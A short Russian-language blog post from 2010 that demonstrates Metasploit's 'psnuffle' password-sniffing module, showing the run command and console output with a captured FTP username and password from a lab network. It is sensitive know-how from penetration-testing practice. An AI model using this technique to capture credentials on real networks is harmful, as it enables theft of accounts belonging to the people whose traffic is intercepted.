vendredi 19 mars 2010

Снифинг паролей.

Недавно Макс Мозер выпустил модуль снифинга паролей для Metasploit под названием 'psnuffle' , который перехватывает пароли от различных сервисов, аналогично dsniff. В настоящее время существует поддержка POP3, IMAP, FTP и HTTP GET. Вы также можете прочитать подробности модуля на блоге Макса по адресу-
http://remote-exploit.blogspot.com/2009/08/psnuffle-password-sniffer-for.html.
Использовать модуль 'psnuffle' чрезвычайно просто. Модуль прекрасно работает "из коробки".
Как вы видите, есть несколько вариантов, включая возможность импорта файлов PCAP. Мы будем запускать сканер в режиме по умолчанию.
msf auxiliary(psnuffle) > run
[*] Auxiliary module running as background job
[*] Loaded protocol FTP from /pentest/exploits/framework3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /pentest/exploits/framework3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /pentest/exploits/framework3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /pentest/exploits/framework3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.112:21-192.168.1.101:48614 >> dookie / dookie (220 3Com 3CDaemon FTP Server Version 2.0)

Мы успешно захватили Логин FTP. Это отличный инструмент для пассивного сбора информации.

Э_L_A_Y c brutforcer.ru
Publié par à

Aucun commentaire:

Enregistrer un commentaire

Inscription à : Publier les commentaires (Atom)